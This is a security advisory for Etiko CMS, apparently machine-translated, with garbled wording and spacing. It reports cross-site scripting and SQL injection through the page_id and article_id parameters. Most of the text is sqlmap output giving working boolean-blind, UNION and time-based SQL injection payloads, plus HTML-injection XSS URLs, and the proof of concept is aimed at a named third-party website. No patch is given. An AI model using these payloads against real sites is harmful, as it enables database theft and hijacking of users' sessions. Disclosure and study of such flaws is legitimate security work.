Etiko CMS index. php Cross-Site Scripting Vulnerability
Affected Systems:
Etiko CMS
Etiko CMS is a content management system.
The Etiko CMS does not validate the index. A cross-site scripting vulnerability exists in php script input implementation. Remote attackers can exploit this vulnerability to execute scripts in users' Web browsers by using the page_id or article_id parameter in the constructed URL, steal cookie authentication creden.
<* Source: Felipe "Renzi" Gabriel
Link: http://xforce.iss.net/xforce/xfdb/97031
*>
Test method:
# SQL Injection & XSS on Etiko CMS.
# Risk: High
# CWE number: CWE-89, CWE-79
# Date: 13/10/2014
# Vendor: www.etikweb.com
# Version: All
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Windows 8; Chrome; Sqlmap 1.0-dev-nongit-20140906
# Vulnerables Files:/index. php &/loja/index. php
# Exploits: http://www.target.com/loja/index.php? Page_id = 19 [XSS] & [SQLi]
Http://www.target.com/index.php? Article_id = 16 [SQLi] & [XSS]
# PoC: The http://www.centrovegetariano.org/loja/index.php? Page_id = 19
Http://www.centrovegetariano.org/index.php? Article_id = 16
--- "SQLI using SQLMAP ."---
---
Place: GET
Parameter: page_id
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: page_id = 19 'AND 3987 = 3987 AND 'tulh' = 'tulh
Type: UNION query
Title: MySQL UNION query (NULL)-3 columns
Payload: page_id =-5362 'Union all select null, NULL, CONCAT (0x7175616f71, 0x467a784a6e62664d5a79, 0x716b756271 )#
Type: AND/OR time-based blind
Title: MySQL> 5.0.11 AND time-based blind
Payload: page_id = 19 'and sleep (5) AND 'mnts' = 'mnts
---
---
Place: GET
Parameter: article_id
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: article_id = 16' AND 8044 = 8044 AND 'ykze' = 'ykze
Type: UNION query
Title: MySQL UNION query (NULL)-10 columns
Payload: article_id =-2752 'Union all select 60,60, 60,60, 60,60, CONCAT (0x7167687671, 0x6d54706b774f4a6f667a, 0x7172707a71), 60,60, 60 #
Type: AND/OR time-based blind
Title: MySQL> 5.0.11 AND time-based blind
Payload: article_id = 16' and sleep (5) AND 'mdwy' = 'mdwy
---
--- "XSS using HTML injection ."---
Http://www.centrovegetariano.org/loja/index.php? Page_id = 19 "> <marquee> XSS </marquee>
Http://www.centrovegetariano.org/index.php? Article_id = 16 "> <marquee> XSS </marquee>
Vendor patch:
Etiko
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.etikweb.com/